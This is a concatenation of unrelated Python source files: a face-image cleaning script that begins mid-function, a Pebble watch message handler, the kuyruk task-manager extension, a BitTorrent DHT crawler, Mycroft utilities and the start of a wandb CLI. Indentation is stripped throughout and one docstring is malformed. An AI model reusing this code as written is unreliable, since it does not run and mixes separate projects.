p = Process(target=self.unit_find_face,args=(i,pass_dir_fr,fail_dir,'fr',))
p.start()
process_list.append(p)
for p in process_list:
p.join()
# use cv2 to check face
paths = readfile().listfiles(pass_dir_fr)
fail_dir = '{}/Downloads/finish_fail/'.format(str(Path.home()))
pass_dir_cv = '{}/Downloads/final_pass/'.format(str(Path.home()))
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
p6 = []
for i in range(length):
if i < round(length/6):
p1.append(paths[i])
elif i >= round(length/6) and i <(2*round(length/6)):
p2.append(paths[i])
elif i >= (2*round(length/6)) and i < (3*round(length/6)):
p3.append(paths[i])
elif i >= (3*round(length/6)) and i < (4*round(length/6)):
p4.append(paths[i])
elif i >= (4*round(length/6)) and i < (5*round(length/6)):
p5.append(paths[i])
else:
p6.append(paths[i])
multp = [p1,p2,p3,p4,p5,p6]
process_list = []
for i in multp:
print("开始运行")
p = Process(target=self.unit_find_face,args=(i,pass_dir_cv,fail_dir,'fr',))
p.start()
process_list.append(p)
for p in process_list:
p.join()
end = datetime.datetime.now()
print(f"总图片:{length} 张 {'*'*10} 用时:{(end - start).seconds} 秒 {'*'*10} 每秒:{round(length/int((end - start).seconds))} 张")
def deletefile(self, path):
if os.path.isdir(path):
# os.remove(path)
subfiles = readfile().listfiles(path)
pool = ThreadPoolExecutor(max_workers=10)
for file in subfiles:
pool.submit(self.deletefile, file)
pool.shutdown()
shutil.rmtree(path)
print(f"删除文件夹:{path}")
else:
os.remove(path)
# print(f"删除文件:{path}")
def face(self, path):
tmpfile = str(random.randint(1, 100000000))+'/'
p = Process(target=self.multp_find_face, args=(path,tmpfile,))
p.start()
p.join()
p = Process(target=self.deletefile, args=(tmpfile,))
p.start()
p.join()
app = QApplication([])
self.Tips("人脸图片清洗已结束\n文件保存在下载文件夹中")
# 提示
def Tips(self, message):
window = QWidget()
window.setWindowOpacity(0.9) # 设置窗口透明度
window.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) # 美化风格
QMessageBox.about(window, "提示", message)
if __name__ == "__main__":
if sys.argv[1] == 'face':
Findface().face(sys.argv[2])
if sys.argv[1] == 'mark':
path = readfile().format_path(sys.argv[2])
paths = readfile().listfiles(path)
start = datetime.datetime.now()
notfind = []
for i in paths:
# print(i)
if Findface().mark_face_detail(i) == False:
notfind.append(i)
print(f"{len(notfind)} 张图片无法找到,需人工检查!!!!")
for i in notfind:
print(i)
end = datetime.datetime.now()
print(f"总图片:{len(paths)} 张 {'*'*10} 用时:{(end - start).seconds} 秒 {'*'*10} 每秒:{round(len(paths)/int((end - start).seconds))} 张")
if sys.argv[1] == 'show':
Findface().show_face_mark(sys.argv[2])
if sys.argv[1] == 'multmark':
Findface().multprocess(sys.argv[2])
if sys.argv[1] == 'delete':
start = datetime.datetime.now()
Findface().deletefile(sys.argv[2])
end = datetime.datetime.now()
print(f"删除文件用时:{(end-start).seconds} 秒")
if sys.argv[1] == 'test':
# pool = ThreadPoolExecutor(max_workers=2)
# path = readfile().format_path(sys.argv[2])
# paths = readfile().listfiles(path)
# for i in paths:
# t = pool.submit(mark_face_detail, i)
# # if not t.running():
# # time.sleep(5)
# # print(i)
# pool.shutdown()
# test(sys.argv[2])
# find_face_cv2(r"C:/Users/cn-wilsonshi/Downloads/finish_fail/3480549624.jpg", '.', '.')
Findface().deletefile(sys.argv[2])
# face_detail(r"C:/Users/cn-wilsonshi/Downloads/old_version/glasses/20.jpg")
|
IncomingMessageService.py
|
from Logics.BluetoothManager import BluetoothManager
from data import ServerEnvelope, PebbleCommand
from services.IncomingPebbleMessageService import IncomingPebbleMessageService
from injector import inject, singleton
import threading
class IncomingMessageService(object):
@singleton
@inject(bluetoothManager = BluetoothManager, incomingPebbleMessageService = IncomingPebbleMessageService)
def __init__(self, bluetoothManager, incomingPebbleMessageService):
self._bluetoothManager = bluetoothManager
self._incomingPebbleMessageService = incomingPebbleMessageService
def HandleIncomingMessage(self, message):
if self._readMessageFromServer(message) == False: return False
def _readMessageFromServer(self, message):
try:
messageList = message.split(',')
messageList = list(filter(None, messageList))
except:
return False
if(self._checkServerMessage(messageList) == False):
return False
def _checkServerMessage(self, message):
"""Check type of received webservice message and handle accordingly"""
envelopeType = int(message[0])
envelopeTypes = ServerEnvelope.ServerEnvelopeType
if(envelopeType == envelopeTypes.scan.value):
"""Scan for Pebbles""""
self._HandleScanCommand()
return
if(envelopeType == envelopeTypes.install.value):
"""Install Pebble application"""
targetPebble = message[1]
url = message[2]
envelope = self._HandleInstallCommand(targetPebble, url)
elif(envelopeType == envelopeTypes.connect.value) or (envelopeType == ServerEnvelope.ServerEnvelopeType.disconnect.value):
"""Connect/Disconnect Pebble"""
targetPebble = message[1]
envelope = self._HandleConnectionCommand(envelopeType, targetPebble)
elif(envelopeType == envelopeTypes.message.value):
"""Send message to specific Pebble applicaiton"""
envelope = self._HandleMessagingCommand(message)
elif(envelopeType == envelopeTypes.notification.value):
"""Send notification to Pebble. This message will pop-up regardless of opened application"""
targetPebble = message[1]
notification = message[2]
envelope = self._HandleNotificationCommand(targetPebble, notification)
else: return False
self._incomingPebbleMessageService.sendMessageToPebble(envelope)
def _HandleScanCommand(self):
"""Scan for available pebbles"""
scanThread = threading.Thread(target=self._bluetoothManager.sendAvailablePebblesToServer)
scanThread.start()
def _HandleInstallCommand(self, targetPebble, url):
"""Download pebble app from given url and install it on given Pebble"""
return ServerEnvelope.ServerEnvelope(ServerEnvelope.ServerEnvelopeType.install.value, target = targetPebble, data = url)
def _HandleConnectionCommand(self, envelopeType, targetPebble):
"""Notify webservice of pebble connection/disconnect"""
return ServerEnvelope.ServerEnvelope(envelopeType, targetPebble)
def _HandleMessagingCommand(self, message):
"""Check type of message to be delivered to Pebble"""
targetPebble = message[1]
messageType = int(message[2])
messageString = message[3]
if(messageType == 1):
listItems = message[4]
transactionId = message[5]
return ServerEnvelope.ServerEnvelope( ServerEnvelope.ServerEnvelopeType.message.value, targetPebble, messageType, data = messageString, note = listItems, uniqueID = transactionId)
else:
transactionID = message[4]
return ServerEnvelope.ServerEnvelope(envelopeType = ServerEnvelope.ServerEnvelopeType.message.value, target = targetPebble, messageType = messageType, data = messageString, uniqueID = transactionID)
def _HandleNotificationCommand(self, targetPebble, notification):
"""Send notifcation to given Pebble"""
return ServerEnvelope.ServerEnvelope(ServerEnvelope.ServerEnvelopeType.notification.value, targetPebble, data = notification)
|
__init__.py
|
from __future__ import division
import os
import json
import socket
import logging
import operator
import threading
from datetime import datetime, timedelta
from time import sleep
from functools import total_ordering, wraps, partial
import amqp
from flask import Flask, Blueprint
from flask import render_template, redirect, request, url_for, jsonify
import waitress
import kuyruk
from kuyruk.signals import worker_start, worker_shutdown
logger = logging.getLogger(__name__)
CONFIG = {
"MANAGER_LISTEN_HOST_HTTP": "127.0.0.1",
"MANAGER_LISTEN_PORT_HTTP": 16500,
"MANAGER_STATS_INTERVAL": 1,
"SENTRY_PROJECT_URL": None,
}
ACTION_WAIT_TIME = 1 # seconds
def start_thread(target, args=(), daemon=False, stop_event=threading.Event()):
target = _retry(stop_event=stop_event)(target)
t = threading.Thread(target=target, args=args)
t.daemon = daemon
t.start()
return t
def _retry(sleep_seconds=1, stop_event=threading.Event(),
on_exception=lambda e: logger.error(e)):
def decorator(f):
@wraps(f)
def inner(*args, **kwargs):
while not stop_event.is_set():
try:
f(*args, **kwargs)
except Exception as e:
if on_exception:
on_exception(e)
if sleep_seconds:
sleep(sleep_seconds)
return inner
return decorator
def _connect(worker):
def handle_manager_message(message):
logger.info("Action received from manager: %s", message.body)
message = json.loads(message.body)
action = message['action']
handlers = {
'warm_shutdown': worker.shutdown,
'cold_shutdown': partial(os._exit, 0),
'quit_task': worker.drop_task,
}
try:
handler = handlers[action]
except KeyError:
logger.error("Unknown action: %s", action)
return
handler()
with worker.kuyruk.channel() as ch:
ch.basic_consume('amq.rabbitmq.reply-to', no_ack=True,
callback=handle_manager_message)
while not worker._manager_connector_stopped.is_set():
stats = _get_stats(worker)
body = json.dumps(stats)
msg = amqp.Message(body=body, type='stats',
reply_to='amq.rabbitmq.reply-to')
ch.basic_publish(msg, routing_key='kuyruk_manager')
try:
ch.connection.heartbeat_tick()
ch.connection.drain_events(
timeout=worker.kuyruk.config.MANAGER_STATS_INTERVAL)
except socket.timeout:
pass
msg = amqp.Message(type='shutdown', reply_to='amq.rabbitmq.reply-to')
ch.basic_publish(msg, routing_key='kuyruk_manager')
def start_connector(sender, worker=None):
worker._manager_connector_stopped = threading.Event()
worker._manager_connector_thread = start_thread(
_connect, args=(worker, ),
stop_event=worker._manager_connector_stopped)
def stop_connector(sender, worker=None):
worker._manager_connector_stopped.set()
worker._manager_connector_thread.join()
class Manager:
def __init__(self, kuyruk):
self.kuyruk = kuyruk
self.workers = {}
self.lock = threading.Lock()
self.requeue = kuyruk.extensions.get("requeue")
self.has_sentry = "sentry" in kuyruk.extensions
if self.has_sentry and not kuyruk.config.SENTRY_PROJECT_URL:
raise Exception("SENTRY_PROJECT_URL is not set")
worker_start.connect(start_connector, sender=kuyruk, weak=False)
worker_shutdown.connect(stop_connector, sender=kuyruk, weak=False)
kuyruk.extensions["manager"] = self
def _accept(self):
with self.kuyruk.channel() as ch:
ch.queue_declare('kuyruk_manager', exclusive=True)
ch.basic_consume('kuyruk_manager', no_ack=True,
callback=self._handle_worker_message)
while True:
try:
ch.connection.heartbeat_tick()
ch.connection.drain_events(timeout=1)
except socket.timeout:
pass
def _handle_worker_message(self, message):
message_type = message.type
reply_to = message.reply_to
if message_type == 'stats':
stats = json.loads(message.body)
with self.lock:
try:
worker = self.workers[reply_to]
except KeyError:
worker = _Worker(reply_to, stats)
self.workers[reply_to] = worker
else:
worker.update(stats)
elif message_type == 'shutdown':
with self.lock:
try:
del self.workers[reply_to]
except KeyError:
pass
def _clean_workers(self):
while True:
sleep(self.kuyruk.config.MANAGER_STATS_INTERVAL)
with self.lock:
now = datetime.utcnow()
for worker in list(self.workers.values()):
if now - worker.updated_at > timedelta(seconds=10):
del self.workers[worker.reply_to]
def flask_blueprint(self):
b = Blueprint("kuyruk_manager", __name__)
b.add_url_rule('/', 'index', self._get_index)
b.add_url_rule('/workers', 'workers', self._get_workers)
b.add_url_rule('/failed-tasks', 'failed_tasks',
self._get_failed_tasks)
b.add_url_rule('/api/failed-tasks', 'api_failed_tasks',
self._api_get_failed_tasks)
b.add_url_rule('/action', 'action',
self._post_action, methods=['POST'])
b.add_url_rule('/action-all', 'action_all',
self._post_action_all, methods=['POST'])
b.add_url_rule('/requeue', 'requeue_task',
self._post_requeue, methods=['POST'])
b.add_url_rule('/delete', 'delete_task',
self._post_delete, methods=['POST'])
b.context_processor(self._context_processors)
return b
def flask_application(self):
app = Flask(__name__)
app.debug = True
app.register_blueprint(self.flask_blueprint())
return app
def _get_index(self):
return redirect(url_for('kuyruk_manager.workers'))
def _get_workers(self):
hostname = request.args.get('hostname')
queue = request.args.get('queue')
consuming = request.args.get('consuming')
working = request.args.get('working')
workers = {}
with self.lock:
for reply_to, worker in self.workers.items():
if hostname and hostname != worker.stats.get('hostname', ''):
continue
if queue and queue not in worker.stats.get('queues', []):
continue
if consuming and not worker.stats.get('consuming', False):
continue
if working and not worker.stats.get('current_task', None):
continue
workers[reply_to] = worker
return render_template('workers.html', workers=workers)
def _failed_tasks(self):
tasks = self.requeue.redis.hvals('failed_tasks')
tasks = [t.decode('utf-8') for t in tasks]
decoder = json.JSONDecoder()
tasks = map(decoder.decode, tasks)
return tasks
def _get_failed_tasks(self):
tasks = list(self._failed_tasks())
return render_template('failed_tasks.html', tasks=tasks)
def _api_get_failed_tasks(self):
return jsonify(tasks=self._failed_tasks())
def _post_action(self):
body = json.dumps({'action': request.form['action']})
msg = amqp.Message(body)
with self.kuyruk.channel() as ch:
ch.basic_publish(msg, '', request.args['id'])
sleep(ACTION_WAIT_TIME)
return redirect_back()
def _post_action_all(self):
body = json.dumps({'action': request.form['action']})
msg = amqp.Message(body)
with self.kuyruk.channel() as ch:
with self.lock:
for id in self.workers:
ch.basic_publish(msg, '', id)
sleep(ACTION_WAIT_TIME)
return redirect_back()
def _post_requeue(self):
task_id = request.form['task_id']
redis = self.requeue.redis
if task_id == 'ALL':
self.requeue.requeue_failed_tasks()
else:
failed = redis.hget('failed_tasks', task_id)
failed = json.loads(failed)
self.requeue.requeue_task(failed)
return redirect_back()
def _post_delete(self):
task_id = request.form['task_id']
self.requeue.redis.hdel('failed_tasks', task_id)
return redirect_back()
def _context_processors(self):
return {
'manager': self,
'now': str(datetime.utcnow())[:19],
'hostname': socket.gethostname(),
'has_requeue': self.requeue is not None,
'has_sentry': self.has_sentry,
'sentry_url': self._sentry_url,
'human_time': self._human_time,
}
def _sentry_url(self, sentry_id):
if not sentry_id:
return
url = self.kuyruk.config.SENTRY_PROJECT_URL
if not url.endswith('/'):
url += '/'
url += '?query=%s' % sentry_id
return url
def _human_time(self, seconds, suffixes=['y', 'w', 'd', 'h', 'm', 's'],
add_s=False, separator=' '):
"""
Takes an amount of seconds and
turns it into a human-readable amount of time.
"""
# the formatted time string to be returned
time = []
# the pieces of time to iterate over (days, hours, minutes, etc)
# the first piece in each tuple is the suffix (d, h, w)
# the second piece is the length in seconds (a day is 60s * 60m * 24h)
parts = [
(suffixes[0], 60 * 60 * 24 * 7 * 52),
(suffixes[1], 60 * 60 * 24 * 7),
(suffixes[2], 60 * 60 * 24),
(suffixes[3], 60 * 60),
(suffixes[4], 60),
(suffixes[5], 1)]
# for each time piece, grab the value and remaining seconds,
# and add it to the time string
for suffix, length in parts:
value = seconds // length
if value > 0:
seconds %= length
time.append('%s%s' % (str(value), (
suffix, (suffix, suffix + 's')[value > 1])[add_s]))
if seconds < 1:
break
return separator.join(time)
def redirect_back():
referrer = request.headers.get('Referer')
if referrer:
return redirect(referrer)
return 'Go back'
_hostname = socket.gethostname()
_pid = os.getpid()
def _get_stats(worker):
return {
'hostname': _hostname,
'uptime': int(worker.uptime),
'pid': _pid,
'version': kuyruk.__version__,
'current_task': getattr(worker.current_task, "name", None),
'current_args': worker.current_args,
'current_kwargs': worker.current_kwargs,
'consuming': worker.consuming,
'queues': worker.queues,
}
@total_ordering
class _Worker:
def __init__(self, reply_to, stats):
self.reply_to = reply_to
self.update(stats)
def __lt__(self, other):
a, b = self._sort_key, other._sort_key
return _lt_tuples(a, b)
@property
def _sort_key(self):
order = ('hostname', 'queues', 'uptime', 'pid')
return operator.itemgetter(*order)(self.stats)
def update(self, stats):
self.stats = stats
self.updated_at = datetime.utcnow()
def _lt_tuples(t1, t2):
for i in range(min(len(t1), len(t2))):
a, b = t1[i], t2[i]
if not a:
return False
if not b:
return True
return a < b
def run_manager(kuyruk, args):
manager = kuyruk.extensions["manager"]
app = manager.flask_application()
start_thread(manager._accept, daemon=True)
start_thread(manager._clean_workers, daemon=True)
waitress.serve(
app,
host=kuyruk.config.MANAGER_LISTEN_HOST_HTTP,
port=kuyruk.config.MANAGER_LISTEN_PORT_HTTP)
help_text = "see and manage kuyruk workers"
command = (run_manager, help_text, None)
|
crawler.py
|
#!/usr/bin/env python
#
# This script is experimental.
#
# Liang Wang @ Dept. Computer Science, University of Helsinki
# 2011.09.20
#
import os, sys
import socket
import pickle
import Queue
import random
import time
import threading
import resource
from khash import *
from bencode import bencode, bdecode
from common import *
CTTIME = 10
class Crawler(object):
def __init__(self, id = None):
self.noisy = True # Output extra info or not
self.id = id if id else newID() # Injector's ID
self.ip = get_myip() # my ip
self.port = get_port(30000, 31000) # my listening port
self.krpc = KRPC() # Simple KRPC translator
self.nodePool = {} # Dict of the nodes collected
self.addrPool = {} # Dict uses <ip,port> as its key
self.nodeQueue = Queue.Queue(0) # Queue of the nodes to scan
self.counter = CTTIME # How long to wait after a queue is empty
self.startTime = time.time() # Time start the crawler
self.duplicates = 0 # How many duplicates among returned nodes
self.total = 1 # Total number of returned nodes
self.respondent = 0 # Number of respondent
self.tn = 0 # Number of nodes in a specified n-bit zone
self.tnold = 0
self.tntold = 0
self.tnspeed = 0
self.isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.isock.bind( ("",self.port) )
self.isock_lock = threading.Lock()
pass
def ping(self, host, port):
msg = self.krpc.encodeReq("ping", {"id":self.id})
Transport(host, port, msg, self.dataComeIn).start()
pass
def findNode(self, host, port, target):
msg = self.krpc.encodeReq("find_node", {"id":self.id, "target":target})
self.isock.sendto(msg, (host,port))
pass
def processNodes(self, nodes):
timestamp = time.time()
for node in nodes:
id = node["id"]
node["timestamp"] = timestamp
node["rtt"] = float('inf')
if id not in self.nodePool:
self.nodePool[id] = [node]
self.convergeSpeed(node)
if id != self.id:
self.nodeQueue.put(node)
else:
if not self.hasNode(node["id"], node["host"], node["port"])\
and id != self.id:
self.nodePool[id].append(node)
else:
self.duplicates += 1
self.total += 1
pass
def hasNode(self, id, host, port):
r = None
for n in self.nodePool[id]:
if n["host"] == host and n["port"] == port:
r = n
break
return r
def serialize(self):
obj = {}
for k, nlist in self.nodePool.items():
for v in nlist:
addr = (v['host'], v['port'])
if addr in self.addrPool:
v["rtt"] = self.addrPool[addr]["timestamp"]- v["timestamp"]
obj[k] = obj.get(k, []) + [v]
timestamp = time.strftime("%Y%m%d%H%M%S")
f = open("nodes.%s.%s" % (timestamp, str(intify(self.id))), "w")
pickle.Pickler(f).dump(obj)
f.close()
pass
def start_listener(self):
while self.counter:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
msgTID, msgType, msgContent = self.krpc.decodeRsp(msg)
if "nodes" in msgContent:
self.processNodes(unpackNodes(msgContent["nodes"]))
self.addrPool[addr] = {"timestamp":time.time()}
self.respondent += 1
except Exception, err:
print "Exception:Crawler.listener():", err
pass
def start_sender(self):
while self.counter:
try:
node = self.nodeQueue.get(True)
if (distance(self.id, node["id"])>>148)==0:
self.findNode(node["host"], node["port"], node["id"])
for i in range(1,5):
tid = stringify(intify(node["id"]) ^ (2**(i*3) - 1))
self.findNode(node["host"], node["port"], tid)
# This threshold can be tuned, maybe use self.respondent
elif self.tn < 2000:
self.findNode(node["host"], node["port"], self.id)
except Exception, err:
print "Exception:Crawler.start_sender()", err, node
pass
def start_crawl(self):
t1 = threading.Thread(target=self.start_listener, args=())
t1.daemon = True
t1.start()
t2 = threading.Thread(target=self.start_sender, args=())
t2.daemon = True
t2.start()
while self.counter:
try:
self.counter = CTTIME if self.nodeQueue.qsize() else self.counter-1
self.info()
time.sleep(1)
except KeyboardInterrupt:
break
except Exception, err:
print "Exception:Crawler.start_crawl()", err
pass
def info(self):
print "[NodeSet]:%i\t\t[12-bit Zone]:%i [%i/s]\t\t[Response]:%.2f%%\t\t[Queue]:%i\t\t[Dup]:%.2f%%" % \
(len(self.nodePool), self.tn, self.tnspeed,
self.respondent*100.0/max(1,len(self.nodePool)),
self.nodeQueue.qsize(), self.duplicates*100.0/self.total)
pass
def convergeSpeed(self,node):
if (distance(self.id, node["id"])>>148)==0:
self.tn += 1
if (time.time()-self.tntold) >= 5:
self.tnspeed = int((self.tn-self.tnold)/(time.time()-self.tntold))
self.tnold = self.tn
self.tntold = time.time()
pass
if __name__=="__main__":
now = time.time()
id = stringify(int(sys.argv[1])) if len(sys.argv)>1 else newID()
crawler = Crawler(id)
# Try to load local node cache
try:
if os.path.exists("nodecache"):
nl = pickle.load(open("nodecache","r"))
for n in nl:
n["timestamp"] = time.time()
n["rtt"] = float('inf')
crawler.nodeQueue.put(n)
except:
pass
# Try to get bootstrap nodes from official router
crawler.findNode("router.bittorrent.com", 6881, crawler.id)
crawler.start_crawl()
print "%.2f minutes" % ((time.time() - now)/60.0)
crawler.serialize()
pass
|
__init__.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re
import socket
import subprocess
from os.path import join, expanduser
from threading import Thread
from time import sleep
import json
import os.path
import psutil
from stat import S_ISREG, ST_MTIME, ST_MODE, ST_SIZE
import requests
import signal as sig
import mycroft.audio
import mycroft.configuration
from mycroft.util.format import nice_number
# Officially exported methods from this file:
# play_wav, play_mp3, play_ogg, get_cache_directory,
# resolve_resource_file, wait_while_speaking
from mycroft.util.log import LOG
from mycroft.util.parse import extract_datetime, extract_number, normalize
from mycroft.util.signal import *
def resolve_resource_file(res_name):
"""Convert a resource into an absolute filename.
Resource names are in the form: 'filename.ext'
or 'path/filename.ext'
The system wil look for ~/.mycroft/res_name first, and
if not found will look at /opt/basilisk/res_name,
then finally it will look for res_name in the 'mycroft/res'
folder of the source code package.
Example:
With mycroft running as the user 'bob', if you called
resolve_resource_file('snd/beep.wav')
it would return either '/home/bob/.mycroft/snd/beep.wav' or
'/opt/basilisk/snd/beep.wav' or '.../mycroft/res/snd/beep.wav',
where the '...' is replaced by the path where the package has
been installed.
Args:
res_name (str): a resource path/name
"""
config = mycroft.configuration.Configuration.get()
# First look for fully qualified file (e.g. a user setting)
if os.path.isfile(res_name):
return res_name
# Now look for ~/.mycroft/res_name (in user folder)
filename = os.path.expanduser("~/.mycroft/" + res_name)
if os.path.isfile(filename):
return filename
# Next look for /opt/basilisk/res/res_name
data_dir = expanduser(config['data_dir'])
filename = os.path.expanduser(join(data_dir, res_name))
if os.path.isfile(filename):
return filename
# Finally look for it in the source package
filename = os.path.join(os.path.dirname(__file__), '..', 'res', res_name)
filename = os.path.abspath(os.path.normpath(filename))
if os.path.isfile(filename):
return filename
return None # Resource cannot be resolved
def play_wav(uri):
""" Play a wav-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_wav_cmdline")
play_wav_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_wav_cmd):
if cmd == "%1":
play_wav_cmd[index] = (get_http(uri))
return subprocess.Popen(play_wav_cmd)
def play_mp3(uri):
""" Play a mp3-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_mp3_cmdline")
play_mp3_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_mp3_cmd):
if cmd == "%1":
play_mp3_cmd[index] = (get_http(uri))
return subprocess.Popen(play_mp3_cmd)
def play_ogg(uri):
""" Play a ogg-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_ogg_cmdline")
play_ogg_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_ogg_cmd):
if cmd == "%1":
play_ogg_cmd[index] = (get_http(uri))
return subprocess.Popen(play_ogg_cmd)
def record(file_path, duration, rate, channels):
if duration > 0:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), "-d",
str(duration), file_path])
else:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), file_path])
def get_http(uri):
return uri.replace("https://", "http://")
def remove_last_slash(url):
if url and url.endswith('/'):
url = url[:-1]
return url
def read_stripped_lines(filename):
with open(filename, 'r') as f:
return [line.strip() for line in f]
def read_dict(filename, div='='):
d = {}
with open(filename, 'r') as f:
for line in f:
(key, val) = line.split(div)
d[key.strip()] = val.strip()
return d
def connected():
""" Check connection by connecting to 8.8.8.8, if this is
blocked/fails, Microsoft NCSI is used as a backup
Returns:
True if internet connection can be detected
"""
return connected_dns() or connected_ncsi()
def connected_ncsi():
""" Check internet connection by retrieving the Microsoft NCSI endpoint.
Returns:
True if internet connection can be detected
"""
try:
r = requests.get('http://www.msftncsi.com/ncsi.txt')
if r.text == u'Microsoft NCSI':
return True
except Exception:
pass
return False
def connected_dns(host="8.8.8.8", port=53, timeout=3):
""" Check internet connection by connecting to DNS servers
Returns:
True if internet connection can be detected
"""
# Thanks to 7h3rAm on
# Host: 8.8.8.8 (google-public-dns-a.google.com)
# OpenPort: 53/tcp
# Service: domain (DNS/TCP)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
return True
except IOError:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(("8.8.4.4", port))
return True
except IOError:
return False
def curate_cache(directory, min_free_percent=5.0, min_free_disk=50):
"""Clear out the directory if needed
This assumes all the files in the directory can be deleted as freely
Args:
directory (str): directory path that holds cached files
min_free_percent (float): percentage (0.0-100.0) of drive to keep free,
default is 5% if not specified.
min_free_disk (float): minimum allowed disk space in MB, default
value is 50 MB if not specified.
"""
# Simpleminded implementation -- keep a certain percentage of the
# disk available.
# TODO: Would be easy to add more options, like whitelisted files, etc.
space = psutil.disk_usage(directory)
# convert from MB to bytes
min_free_disk *= 1024 * 1024
# space.percent = space.used/space.total*100.0
percent_free = 100.0 - space.percent
if percent_free < min_free_percent and space.free < min_free_disk:
LOG.info('Low diskspace detected, cleaning cache')
# calculate how many bytes we need to delete
bytes_needed = (min_free_percent - percent_free) / 100.0 * space.total
bytes_needed = int(bytes_needed + 1.0)
# get all entries in the directory w/ stats
entries = (os.path.join(directory, fn) for fn in os.listdir(directory))
entries = ((os.stat(path), path) for path in entries)
# leave only regular files, insert modification date
entries = ((stat[ST_MTIME], stat[ST_SIZE], path)
for stat, path in entries if S_ISREG(stat[ST_MODE]))
# delete files with oldest modification date until space is freed
space_freed = 0
for moddate, fsize, path in sorted(entries):
try:
os.remove(path)
space_freed += fsize
except Exception:
pass
if space_freed > bytes_needed:
return # deleted enough!
def get_cache_directory(domain=None):
"""Get a directory for caching data
This directory can be used to hold temporary caches of data to
speed up performance. This directory will likely be part of a
small RAM disk and may be cleared at any time. So code that
uses these cached files must be able to fallback and regenerate
the file.
Args:
domain (str): The cache domain. Basically just a subdirectory.
Return:
str: a path to the directory where you can cache data
"""
config = mycroft.configuration.Configuration.get()
dir = config.get("cache_path")
if not dir:
# If not defined, use /tmp/mycroft/cache
dir = os.path.join(tempfile.gettempdir(), "mycroft", "cache")
return ensure_directory_exists(dir, domain)
def validate_param(value, name):
if not value:
raise ValueError("Missing or empty %s in mycroft.conf " % name)
def is_speaking():
"""Determine if Text to Speech is occurring
Returns:
bool: True while still speaking
"""
LOG.info("mycroft.utils.is_speaking() is depreciated, use "
"mycroft.audio.is_speaking() instead.")
return mycroft.audio.is_speaking()
def wait_while_speaking():
"""Pause as long as Text to Speech is still happening
Pause while Text to Speech is still happening. This always pauses
briefly to ensure that any preceeding request to speak has time to
begin.
"""
LOG.info("mycroft.utils.wait_while_speaking() is depreciated, use "
"mycroft.audio.wait_while_speaking() instead.")
return mycroft.audio.wait_while_speaking()
def stop_speaking():
# TODO: Less hacky approach to this once Audio Manager is implemented
# Skills should only be able to stop speech they've initiated
LOG.info("mycroft.utils.stop_speaking() is depreciated, use "
"mycroft.audio.stop_speaking() instead.")
mycroft.audio.stop_speaking()
def get_arch():
""" Get architecture string of system. """
return os.uname()[4]
def reset_sigint_handler():
"""
Reset the sigint handler to the default. This fixes KeyboardInterrupt
not getting raised when started via start-mycroft.sh
"""
sig.signal(sig.SIGINT, sig.default_int_handler)
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received"""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
def create_echo_function(name, whitelist=None):
from mycroft.configuration import Configuration
blacklist = Configuration.get().get("ignore_logs")
def echo(message):
"""Listen for messages and echo them for logging"""
try:
js_msg = json.loads(message)
if whitelist and js_msg.get("type") not in whitelist:
return
if blacklist and js_msg.get("type") in blacklist:
return
if js_msg.get("type") == "registration":
# do not log tokens from registration messages
js_msg["data"]["token"] = None
message = json.dumps(js_msg)
except Exception:
pass
LOG(name).debug(message)
return echo
def camel_case_split(identifier: str) -> str:
"""Split camel case string"""
regex = '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)'
matches = re.finditer(regex, identifier)
return ' '.join([m.group(0) for m in matches])
|
cli.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import click
import copy
from functools import wraps
import glob
import io
import json
import logging
import netrc
import os
import random
import re
import requests
import shlex
import signal
import socket
import stat
import subprocess
import sys
import textwrap
import time
import traceback
import yaml
import threading
import random
import platform
import datetime
import shutil
# pycreds has a find_executable that works in windows
from dockerpycreds.utils import find_executable
from wandb import util
from click.utils import LazyFile
from click.exceptions import BadParameter, ClickException, Abort
# whaaaaat depends on prompt_toolkit < 2, ipython now uses > 2 so we vendored for now
# DANGER this changes the sys.path so we should never do this in a user script
whaaaaat = util.vendor_import("whaaaaat")
import six
from six.moves import BaseHTTPServer, urllib, configparser
import socket
from .core import termlog
import wandb
from wandb.apis import InternalApi
from wandb.wandb_config import Config
from wandb import wandb_agent
from wandb import wandb_controller
from wandb import env
from wandb import wandb_run
from wandb import wandb_dir
from wandb import run_manager
from wandb import Error
from wandb.magic_impl import magic_install
DOCS_URL = 'http://docs.wandb.com/'
logger = logging.getLogger(__name__)
class ClickWandbException(ClickException):
def format_message(self):
log_file = util.get_log_file_path()
